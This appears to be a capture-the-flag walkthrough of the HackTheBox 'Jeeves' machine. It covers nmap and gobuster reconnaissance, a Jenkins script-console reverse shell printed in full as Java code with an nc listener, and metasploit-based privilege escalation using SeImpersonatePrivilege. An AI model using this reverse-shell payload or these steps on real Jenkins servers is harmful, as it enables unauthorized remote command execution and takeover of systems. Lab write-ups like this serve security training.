┌──(root💀kali)-[~]
└─# nmap -T4 -A -p- 10.10.10.63
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-08 13:34 EDT
Nmap scan report for 10.10.10.63
Host is up (0.025s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Ask Jeeves
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open http Jetty 9.4.z-SNAPSHOT
|_http-title: Error 404 Not Found
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2008|10|7|Vista (88%)
OS CPE: cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_10:1607 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows Server 2008 R2 (88%), Microsoft Windows 10 1607 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%), Microsoft Windows Server 2008 SP1 or Windows Server 2008 R2 (85%), Microsoft Windows 7 (85%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (85%), Microsoft Windows 10 1511 - 1607 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-04-08T22:44:11
|_ start_date: 2022-04-08T22:41:38
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
|_clock-skew: mean: 5h07m23s, deviation: 0s, median: 5h07m23s
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 24.57 ms 10.10.14.1
2 24.81 ms 10.10.10.63
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 161.40 seconds
Port 80
Gobuster does not give much
Port 50000
If we look at the system info we get a user name: kohsuke
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
Let's set a listener rlwrap nc -lvp 8044
It works we are jeeves\kohsuke
We can grab our user flag type C:\Users\kohsuke\Desktop\user.txt
It seems gives stack trace when trying to search for something
But it is just an image, indeed the action of the form will just go to error.html
Here is what we see on the browser for this port:
Gosbuster does not always work for the first time we need to use different wordlists, I tried a few before getting to the askjeeves result. The one that gave the result is directory-list-2.3-big.txt
If we navigate to /askjeeves we have a jenkins server
If we go to jenkins cli we can use a jar and execute command from it
Script console also seems interesting, let's try to get a reverse shell this way
We can find one online here:
Here are our privileges
We have the SeImpersonatePrivilege enabled
set SRVHOST tun0
Now we just need to execute this in our target
And we get a meterpreter session
To get the build in potato options lets use metasploit exploit suggester run post/multi/recon/local_exploit_suggester
run
And it worked
Event though we got authority system the root flag is not here instead we have this